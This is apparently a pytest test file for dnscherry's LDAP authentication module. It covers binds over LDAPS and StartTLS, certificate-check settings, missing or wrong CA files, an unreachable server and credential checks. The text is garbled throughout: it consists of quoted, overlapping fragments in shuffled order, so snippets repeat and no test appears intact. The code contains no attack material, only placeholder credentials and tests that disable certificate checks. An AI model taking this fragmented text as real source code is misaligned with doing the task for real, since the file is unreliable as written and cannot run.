"testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2,",
"e[0]['info'] == 'TLS: hostname does not match CN in peer certificate' def testConnectStartTLS(self):",
"= 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self):",
"'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN",
"inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] =",
"unicode_literals import pytest import sys from sets import Set from dnscherry.auth.modLdap import Auth,",
"cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def",
"inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN",
"def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv =",
"inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as",
"as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2,",
"testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on'",
"cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log)",
"'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)',",
"['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object):",
"in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] =",
"e: assert e[0]['info'] == 'TLS: hostname does not match CN in peer certificate'",
"class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2",
"def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] =",
"cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info']",
"inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] =",
"Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2",
"traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber',",
"inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password',",
"'./test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv",
"'<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res =",
"as e: assert e[0]['info'] == 'TLS: hostname does not match CN in peer",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn,",
"'(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='',",
"inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res",
"inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return",
"'./test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e:",
"sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import",
"'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10,",
"= cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] =",
"ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on'",
"== True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or",
"res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self):",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc",
"except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not match CN",
"from __future__ import unicode_literals import pytest import sys from sets import Set from",
"hostname does not match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy()",
"'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True",
"python # -*- coding: utf-8 -*- from __future__ import with_statement from __future__ import",
"inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return",
"cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv",
"testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def",
"'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc =",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap",
"cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error",
"testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt'",
"pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home',",
"= 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect()",
"e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on'",
"Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert",
"syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn',",
"cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap",
"= Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e:",
"= inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS:",
"def testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log) except",
"= 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except",
"Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log)",
"testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log) except MissingKey:",
"TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 =",
"# -*- coding: utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals",
"inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy()",
"Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return",
"ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] ==",
"'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2",
"inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv =",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2,",
"cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret",
"ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password')",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try:",
"__future__ import unicode_literals import pytest import sys from sets import Set from dnscherry.auth.modLdap",
"__future__ import with_statement from __future__ import unicode_literals import pytest import sys from sets",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc =",
"ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not",
"= ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class",
"'<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {} return True try:",
"= inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log)",
"def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv =",
"def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret ==",
"inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname",
"return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv",
"logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn':",
"does not match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri']",
"= 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv =",
"inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv",
"inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def",
"cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect()",
"#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import with_statement from __future__",
"'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error =",
"cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def",
"= syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName',",
"dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap cfg = {",
"def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv =",
"= inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2",
"= inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword)",
"inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def",
"e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on'",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try:",
"not match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca':",
"cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def",
"'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid',",
"CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals import pytest import",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca']",
"'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def",
"Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log)",
"'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, }",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv",
"== 'TLS: hostname does not match CN in peer certificate' def testConnectStartTLS(self): cfg2",
"'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem',",
"cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log) except MissingKey: return",
"'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log)",
"import pytest import sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist",
"cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def",
"from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging",
"inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn,",
"'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout':",
"context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid',",
"cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword)",
"inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>')",
"False def testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log)",
"import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap",
"ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap =",
"return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on'",
"ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri']",
"cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc =",
"\"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error",
"'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self):",
"'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr':",
"cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt'",
"Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 =",
"try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return",
"inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv =",
"def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>')",
"cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv =",
"'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO,",
"'(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False):",
"'./tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\",",
"return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off'",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv =",
"= inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri']",
"import with_statement from __future__ import unicode_literals import pytest import sys from sets import",
"attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn']",
"= Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg,",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn,",
"= 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except",
"try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does",
"-*- from __future__ import with_statement from __future__ import unicode_literals import pytest import sys",
"ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2",
"= cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try:",
"= inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson',",
"'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr",
"True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv",
"ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg,",
"ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {} return True",
"syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email',",
"'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off',",
"sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn,",
"assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser',",
"Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri']",
"ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword)",
"testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2,",
"except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636'",
"as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"= 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc",
"= Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg,",
"= Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy()",
"== False def testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2,",
"def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] =",
"{ 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389',",
"'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log)",
"10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr =",
"ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not match CN in",
"ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret =",
"ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword':",
"ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy()",
"assert res == False def testMissingParam(self): cfg2 = {} return True try: inv",
